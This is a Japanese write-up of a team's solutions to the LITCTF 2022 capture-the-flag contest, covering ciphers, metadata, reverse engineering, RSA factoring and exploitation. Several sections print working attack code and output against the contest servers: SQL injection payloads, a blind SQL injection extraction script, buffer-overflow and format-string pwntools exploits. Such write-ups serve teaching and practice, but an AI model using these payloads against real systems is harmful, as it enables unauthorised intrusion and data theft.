この大会は2022/7/23 0:00(JST)~2022/7/25 13:00(JST)に開催されました。
今回もチームで参戦。結果は3878点で544チーム中39位でした。
自分で解けた問題をWriteupとして書いておきます。
HelloWorld (misc)
シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。
Rotation 13: LITCTF{W3lc0m3_T0_L1TCTF}
LITCTF{W3lc0m3_T0_L1TCTF}
Hex to ASCII (misc)
hexデコードする。
$ echo 4c49544354467b74306f6c355f346e645f77336273317433735f6172335f763372795f696d70307274346e745f6630725f4354467d | xxd -r -p LITCTF{t0ol5_4nd_w3bs1t3s_ar3_v3ry_imp0rt4nt_f0r_CTF}
LITCTF{t0ol5_4nd_w3bs1t3s_ar3_v3ry_imp0rt4nt_f0r_CTF}
PeanutButter.jar (misc)
ctftimeのPeanutButter.jarチームのページにフラグが書いてあった。
LITCTF{H4s_Th3ir_0wn_CTF_OTZ_OTZ_OTZ}
Personal Website (web)
スクロールしても最下部にはたどり着かない。HTMLソースを見ると、フラグの先頭が見つかった。
<p>HAHAHAHAHAHAHAHAHAHA I know you will never reach the bottom here because of my infinite scroll. If you somehow did, here is the first third of the half LITCTF{E5th3r_M4n</p>
リンクされているhttp://litctf.live:31777/style.cssを見ると、フラグの真ん中の部分が見つかった。
/* _i5_s0_OTZ_0TZ_OFZ_4t_ */
リンクされているhttp://litctf.live:31777/javascript.jsを見ると、フラグの末尾が見つかった。
// 3v3ryth1ng_sh3_d03s}
LITCTF{E5th3r_M4n_i5_s0_OTZ_0TZ_OFZ_4t_3v3ryth1ng_sh3_d03s}
CodeTiger orz Is Meta (misc)
$ exiftool codetigerfanpic.png ExifTool Version Number : 11.88 File Name : codetigerfanpic.png Directory : . File Size : 27 kB File Modification Date/Time : 2022:07:23 06:36:34+09:00 File Access Date/Time : 2022:07:23 06:39:26+09:00 File Inode Change Date/Time : 2022:07:23 06:36:34+09:00 File Permissions : rwxrwxrwx File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 1536 Image Height : 864 Bit Depth : 8 Color Type : RGB Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced SRGB Rendering : Perceptual Gamma : 2.2 Pixels Per Unit X : 4724 Pixels Per Unit Y : 4724 Pixel Units : meters Coded Character Set : UTF8 Envelope Record Version : 4 Object Name : LITCTF{c0de_ Copyright Notice : orz} Caption-Abstract : t1g2r_ Application Record Version : 4 XMP Toolkit : Image::ExifTool 12.36 Description : t1g2r_ Rights : orz} Title : LITCTF{c0de_ Exif Byte Order : Big-endian (Motorola, MM) Image Description : t1g2r_ X Resolution : 72 Y Resolution : 72 Resolution Unit : inches Y Cb Cr Positioning : Centered Copyright : orz} Image Size : 1536x864 Megapixels : 1.3
Object Name、Caption-Abstract、Copyright Noticeのフラグの破片を結合する。
LITCTF{c0de_t1g2r_orz}
Discord Flag (misc)
Discordに入り、#announcementsチャネルのメッセージを見ると、フラグが書いてあった。
LITCTF{L1T_1S_G0NNA_BE_S0_LIT_W1TH_Y0U_GUYS!}
Kevin's Cookies (web)
クッキーのlikeCookieの値がfalseになっているので、trueにしてリロードすると、以下のメッセージになった。
Oh silly you. What do you mean you like a true cookie? I have 20 cookies numbered from 1 to 20, and all of them are made from super true authentic recipes.
クッキーのlikeCookieの値を1から順に設定してみると、17の時にフラグが表示された。
LITCTF{Bd1mens10n_15_l1k3_sup3r_dup3r_0rzzzz}
Running Up That Hill (crypto)
Hill暗号。https://www.dcode.fr/hill-cipherで復号する。
LITCTF{B3_RUNN1NG_UP_TH4T_H1LLLL}
math test (rev)
Ghidraでデコンパイルする。
void main(void) { int local_c; puts("Welcome to the math test. If you get a perfect score, I will print the flag!"); puts("All questions will have non-negative integer answers.\n"); for (local_c = 0; local_c < NUM_Q; local_c = local_c + 1) { printf("Question #%d: ",(ulong)(local_c + 1)); puts(*(char **)(questions + (long)local_c * 8)); __isoc99_scanf(&DAT_00102286); } grade_test(); return; } void grade_test(void) { int local_10; uint local_c; local_c = 0; for (local_10 = 0; local_10 < NUM_Q; local_10 = local_10 + 1) { if (*(long *)(submitted + (long)local_10 * 8) == *(long *)(answers + (long)local_10 * 8)) { local_c = local_c + 1; } } printf("You got %d out of 10 right!\n",(ulong)local_c); if (local_c == 10) { puts("Wow! That\'s a perfect score!"); puts("Here\'s the flag:"); generate_flag(); } else { puts("If you get a 10 out of 10, I will give you the flag!"); } return; } void generate_flag(void) { int local_14; int local_10; int local_c; for (local_c = 0; local_c < NUM_Q; local_c = local_c + 1) { for (local_10 = 0; local_10 < FLAG_LEN; local_10 = local_10 + 1) { *(ulong *)(flag + (long)local_10 * 8) = *(ulong *)(flag + (long)local_10 * 8) ^ ((long)local_10 ^ 0xbf58476d1ce4e5b9U) * (*(ulong *)(submitted + (long)local_c * 8) ^ 0x94d049bb133111eb); } } for (local_14 = 0; local_14 < FLAG_LEN; local_14 = local_14 + 1) { printf("%c",*(undefined8 *)(flag + (long)local_14 * 8)); } putchar(10); return; } answers XREF[3]: Entry Point(*), grade_test:00101307(*), grade_test:0010130e(R) 00104080 02 00 00 undefine 00 00 00 00 00 04 00104080 02 undefined102h [0] XREF[3]: Entry Point(*), grade_test:00101307(*), grade_test:0010130e(R) 00104081 00 undefined100h [1] 00104082 00 undefined100h [2] 00104083 00 undefined100h [3] 00104084 00 undefined100h [4] 00104085 00 undefined100h [5] 00104086 00 undefined100h [6] 00104087 00 undefined100h [7] 00104088 04 undefined104h [8] 00104089 00 undefined100h [9] 0010408a 00 undefined100h [10] 0010408b 00 undefined100h [11] 0010408c 00 undefined100h [12] 0010408d 00 undefined100h [13] 0010408e 00 undefined100h [14] 0010408f 00 undefined100h [15] 00104090 f0 undefined1F0h [16] 00104091 00 undefined100h [17] 00104092 00 undefined100h [18] 00104093 00 undefined100h [19] 00104094 00 undefined100h [20] 00104095 00 undefined100h [21] 00104096 00 undefined100h [22] 00104097 00 undefined100h [23] 00104098 03 undefined103h [24] 00104099 00 undefined100h [25] 0010409a 00 undefined100h [26] 0010409b 00 undefined100h [27] 0010409c 00 undefined100h [28] 0010409d 00 undefined100h [29] 0010409e 00 undefined100h [30] 0010409f 00 undefined100h [31] 001040a0 6d undefined16Dh [32] 001040a1 8d undefined18Dh [33] 001040a2 de undefined1DEh [34] 001040a3 09 undefined109h [35] 001040a4 00 undefined100h [36] 001040a5 00 undefined100h [37] 001040a6 00 undefined100h [38] 001040a7 00 undefined100h [39] 001040a8 0a undefined10Ah [40] 001040a9 00 undefined100h [41] 001040aa 00 undefined100h [42] 001040ab 00 undefined100h [43] 001040ac 00 undefined100h [44] 001040ad 00 undefined100h [45] 001040ae 00 undefined100h [46] 001040af 00 undefined100h [47] 001040b0 87 undefined187h [48] 001040b1 15 undefined115h [49] 001040b2 59 undefined159h [50] 001040b3 00 undefined100h [51] 001040b4 00 undefined100h [52] 001040b5 00 undefined100h [53] 001040b6 00 undefined100h [54] 001040b7 00 undefined100h [55] 001040b8 49 undefined149h [56] 001040b9 1e undefined11Eh [57] 001040ba a1 undefined1A1h [58] 001040bb 06 undefined106h [59] 001040bc 00 undefined100h [60] 001040bd 00 undefined100h [61] 001040be 00 undefined100h [62] 001040bf 00 undefined100h [63] 001040c0 5f undefined15Fh [64] 001040c1 e9 undefined1E9h [65] 001040c2 60 undefined160h [66] 001040c3 20 undefined120h [67] 001040c4 00 undefined100h [68] 001040c5 00 undefined100h [69] 001040c6 00 undefined100h [70] 001040c7 00 undefined100h [71] 001040c8 09 undefined109h [72] 001040c9 00 undefined100h [73] 001040ca 00 undefined100h [74] 001040cb 00 undefined100h [75] 001040cc 00 undefined100h [76] 001040cd 00 undefined100h [77] 001040ce 00 undefined100h [78] 001040cf 00 undefined100h [79]
answerに答えがある。
Q1: 2 (=0x0000000000000002) Q2: 4 (=0x0000000000000004) Q3: 240 (=0x00000000000000f0) Q4: 3 (=0x0000000000000003) Q5: 165580141 (=0x0000000009de8d6d) Q6: 10 (=0x000000000000000a) Q7: 5838215 (=0x0000000000591587) Q8: 111222345 (=0x0000000006a11e49) Q9: 543222111 (=0x000000002060e95f) Q10: 9 (=0x0000000000000009)
この答えを答えていく。
$ ./math Welcome to the math test. If you get a perfect score, I will print the flag! All questions will have non-negative integer answers. Question #1: What is 1+1? 2 Question #2: How many sides does a square have? 4 Question #3: What is 8*30? 240 Question #4: What is the remainder when 39 is divided by 4? 3 Question #5: What is the 41st fibbonaci number? 165580141 Question #6: How many questions are on this test? 10 Question #7: What number am I thinking of? 5838215 Question #8: What is the answer to this question? 111222345 Question #9: Prove that the answer to the previous question is correct. 543222111 Question #10: Give me an integer. 9 You got 10 out of 10 right! Wow! That's a perfect score! Here's the flag: LITCTF{y0u_must_b3_gr8_@_m4th_i_th0ught_th4t_t3st_was_imp0ss1bl3!}
LITCTF{y0u_must_b3_gr8_@_m4th_i_th0ught_th4t_t3st_was_imp0ss1bl3!}
Guess The Pokemon (web)
SQLインジェクション。以下を入力して、Submitすると、フラグが表示された。
1 or 1=1 -- -
LITCTF{flagr3l4t3dt0pok3m0n0rsom3th1ng1dk}
save_tyger (pwn)
$ file save_tyger save_tyger: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5bfe49d59c6568478849959669340ec6dc7dbd7d, for GNU/Linux 3.2.0, not stripped
BOFでpassを上書きして0xabadaaabにする。
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('litctf.live', 31786) else: p = process('./save_tyger') payload = b'A' * 40 payload += p64(0xabadaaab) data = p.recvuntil(b'\n').rstrip().decode() print(data) data = p.recvuntil(b'\n').rstrip().decode() print(data) print(payload) p.sendline(payload) data = p.recvuntil(b'\n').rstrip().decode() print(data) data = p.recvuntil(b'\n').rstrip().decode() print(data)
実行結果は以下の通り。
[+] Opening connection to litctf.live on port 31786: Done Oh no, someone stole our one and only Tyger! :noo: Would you help us save him? b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xab\xaa\xad\xab\x00\x00\x00\x00' It worked! LITCTF{y4yy_y0u_sav3d_0ur_m41n_or94n1z3r} [*] Closed connection to litctf.live port 31786
LITCTF{y4yy_y0u_sav3d_0ur_m41n_or94n1z3r}
save_tyger2 (pwn)
$ file save_tyger2 save_tyger2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=de3f886845dafa4aba9055e73a689bb63def6740, for GNU/Linux 3.2.0, not stripped
BOFでcell関数をコールする。
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('litctf.live', 31788) else: p = process('./save_tyger2') elf = ELF('./save_tyger2') cell_addr = elf.symbols['cell'] payload = b'A' * 40 payload += p64(cell_addr) data = p.recvuntil(b'\n').rstrip().decode() print(data) data = p.recvuntil(b'\n').rstrip().decode() print(data) print(payload) p.sendline(payload) data = p.recvuntil(b'\n').rstrip().decode() print(data) data = p.recvuntil(b'\n').rstrip().decode() print(data)
実行結果は以下の通り。
[+] Opening connection to litctf.live on port 31788: Done [*] '/mnt/hgfs/Shared/save_tyger2' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) NOOOO, THEY TOOK HIM AGAIN! Please help us get him out or there is no way we will be able to prepare LIT :sadness: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb\x11@\x00\x00\x00\x00\x00' Thank god you got him out of this cockroach-infested cell! LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain} [*] Closed connection to litctf.live port 31788
LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}
Among Us (web)
サイトのページ、リンクされているファイルにはフラグらしきものは見つからない。指定のURLのページのレスポンス情報を見てみる。
$ curl http://litctf.live:31779/ --dump-header - -o /dev/null % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0HTTP/1.1 200 OK x-powered-by: Express accept-ranges: bytes cache-control: public, max-age=0 last-modified: Mon, 18 Jul 2022 01:42:49 GMT etag: W/"10d2-1820ef8e905" content-type: text/html; charset=UTF-8 content-length: 4306 date: Sat, 23 Jul 2022 05:15:29 GMT keep-alive: timeout=5 100 4306 100 4306 0 0 11155 0 --:--:-- --:--:-- --:--:-- 11155
リンクされているページのレスポンス情報を見てみる。
$ curl http://litctf.live:31779/sussy-yellow-amogus --dump-header - -o /dev/null % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0HTTP/1.1 200 OK x-powered-by: Express sussyflag: LITCTF{mr_r4y_h4n_m4y_b3_su55y_bu7_4t_l3ast_h3s_OTZOTZOTZ} accept-ranges: bytes cache-control: public, max-age=0 last-modified: Mon, 18 Jul 2022 01:43:01 GMT etag: W/"4d917-1820ef91815" content-type: image/gif content-length: 317719 date: Sat, 23 Jul 2022 05:17:32 GMT keep-alive: timeout=5 100 310k 100 310k 0 0 197k 0 0:00:01 0:00:01 --:--:-- 197k
sussyflagにフラグが設定されていた。
LITCTF{mr_r4y_h4n_m4y_b3_su55y_bu7_4t_l3ast_h3s_OTZOTZOTZ}
waifu (pwn)
$ file waifu waifu: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b8d0e98c1a7ea5c95005bc6804f6d1ed7656a9c, for GNU/Linux 3.2.0, not stripped
FSBを使って、メモリ上のフラグをリークする。
#!/usr/bin/env python3 from pwn import * flag = '' i = 6 while True: if len(sys.argv) == 1: p = remote('litctf.live', 31791) else: p = process('./waifu') payload = f'%{i}$p' data = p.recvuntil(b'\n').rstrip().decode() print(data) print(payload) p.sendline(payload.encode()) data = p.recvuntil(b':\n').rstrip().decode() print(data) data = p.recvuntil(b'\n').rstrip().decode() print(data) flag += p64(int(data, 16)).decode() if '}' in flag: break p.close() i += 1 print(flag)
実行結果は以下の通り。
[+] Opening connection to litctf.live on port 31791: Done Do you like waifus? %6$p Wtmoo how could you say: 0x667b46544354494c [*] Closed connection to litctf.live port 31791 [+] Opening connection to litctf.live on port 31791: Done Do you like waifus? %7$p Wtmoo how could you say: 0x747833745f6d3072 [*] Closed connection to litctf.live port 31791 [+] Opening connection to litctf.live on port 31791: Done Do you like waifus? %8$p Wtmoo how could you say: 0x755f68732e377234 [*] Closed connection to litctf.live port 31791 [+] Opening connection to litctf.live on port 31791: Done Do you like waifus? %9$p Wtmoo how could you say: 0x6161616161616177 [*] Closed connection to litctf.live port 31791 [+] Opening connection to litctf.live on port 31791: Done Do you like waifus? %10$p Wtmoo how could you say: 0x7d61616161616161 LITCTF{fr0m_t3xt4r7.sh_uwaaaaaaaaaaaaaa} [*] Closed connection to litctf.live port 31791
LITCTF{fr0m_t3xt4r7.sh_uwaaaaaaaaaaaaaa}
Amy The Hedgehog (web)
SQLインジェクションができないか試してみる。
a →wrong!!! (。•̀ᴗ-)✧ ' union select 1 -- →(≧U≦❁) You got it!!! ' union select name from names -- →(≧U≦❁) You got it!!! ' or 1=1 -- →(≧U≦❁) You got it!!!
Blind SQL Injectionでフラグを求める。
#!/usr/bin/env python3 import requests url = 'http://litctf.live:31770/' flag_len = -1 for i in range(1, 33): data = {"name": "' or (SELECT length(name) FROM names) = " + str(i) + " --"} r = requests.post(url, data=data) if 'You got it!!!' in r.text: flag_len = i break print('[+] Flag Length is:', flag_len) flag = '' for i in range(1, flag_len + 1): for code in range(33, 127): data = {"name": "' or substr((SELECT name FROM names)," + str(i) + ",1)" + " = '" + chr(code) + "' --"} r = requests.post(url, data=data) if 'You got it!!!' in r.text: flag += chr(code) break print('[+] flag:', flag) print('[*] flag:', flag)
実行結果は以下の通り。
[+] Flag Length is: 13 [+] flag: L [+] flag: LI [+] flag: LIT [+] flag: LITC [+] flag: LITCT [+] flag: LITCTF [+] flag: LITCTF{ [+] flag: LITCTF{s [+] flag: LITCTF{sl [+] flag: LITCTF{sld [+] flag: LITCTF{sldj [+] flag: LITCTF{sldjf [+] flag: LITCTF{sldjf} [*] flag: LITCTF{sldjf}
LITCTF{sldjf}
EYANGCH Fan Art Maker (web)
適当な入力をしてSubmitすると、マーカーに隠れてあまりフラグは見えない。デフォルトのフラグ表示と別に、位置を調整してフラグを表示させる。
例えば、以下のように入力すると、フラグが見えるようになる。
<flag x="200" y="550"></flag>
LITCTF{wh4t_d03s_CH_1n_EyangCH_m3an???}
A ROCk (crypto)
ROCAの問題。necaを使ってNを素因数分解する。
$ ./neca 8721839759350069167278335804233522732628197837843780295129915563071581371083672792796544014245271677069445637593635290140076123157617389715458979685368727 NECA - Not Even Coppersmith's Attack ROCA weak RSA key attack by Jannis Harder (me@jix.one) *** Currently only 512-bit keys are supported *** N = 8721839759350069167278335804233522732628197837843780295129915563071581371083672792796544014245271677069445637593635290140076123157617389715458979685368727 Factoring... [========== ] 43.32% elapsed: 1000s left: 1308.58s total: 2308.64 [========== ] 43.36% elapsed: 1001s left: 1307.57s total: 2308.63 [========== ] 43.41% elapsed: 1002s left: 1306.55s total: 2308.61 [========== ] 43.45% elapsed: 1003s left: 1305.54s total: 2308.61 [========== ] 43.49% elapsed: 1004s left: 1304.67s total: 2308.69 : [============== ] 56.50% elapsed: 1303s left: 1003.19s total: 2306.19 [============== ] 56.55% elapsed: 1304s left: 1002.09s total: 2306.17 [============== ] 56.59% elapsed: 1305s left: 1001.09s total: 2306.17 [============== ] 56.63% elapsed: 1306s left: 1000.17s total: 2306.19 [============== ] 57.07% elapsed: 1316s left: 990.10s total: 2306.10s Factorization found: N = 70672758723177433011581077796363544664410141195648490771860623139983928782297 * 123411621633636675541493070644959834875873057348494554188657868973313372350191
素因数分解できたので、通常通り復号する。
#!/usr/bin/env python3 from Crypto.Util.number import * with open('nums.txt', 'r') as f: params = f.read().splitlines() n = int(params[0].split('=')[1]) e = int(params[1].split('=')[1]) ct = int(params[2].split('=')[1]) p = 70672758723177433011581077796363544664410141195648490771860623139983928782297 q = 123411621633636675541493070644959834875873057348494554188657868973313372350191 assert p * q == n phi = (p - 1) * (q - 1) d = inverse(e, phi) m = pow(ct, d, n) flag = long_to_bytes(m).decode() print(flag)
LITCTF{rsalib_n0_m0r333}
Flashy Colors (crypto)
画像の縦方向に、RGBで255の場合は1、0の場合に置き換え、2進数として並べ、デコードする。
#!/usr/bin/env python3 from PIL import Image from Crypto.Util.number import * img = Image.open('FlashyColors.png').convert('RGB') w, h = img.size bin_data = '' for x in range(0, w, 240): for y in range(0, h, 240): r, g, b = img.getpixel((x, y)) bin_data += str(r & 1) + str(g & 1) + str(b & 1) flag = long_to_bytes(int(bin_data, 2)).decode() print(flag)
LITCTF{0MG_I_l0ve_th3s3_fla5hy_c0lor}
Survey (misc)
アンケートに答えたら、フラグが表示された。
LITCTF{Th4nk5_for_c0m1ng_w3_l0v3_y0u}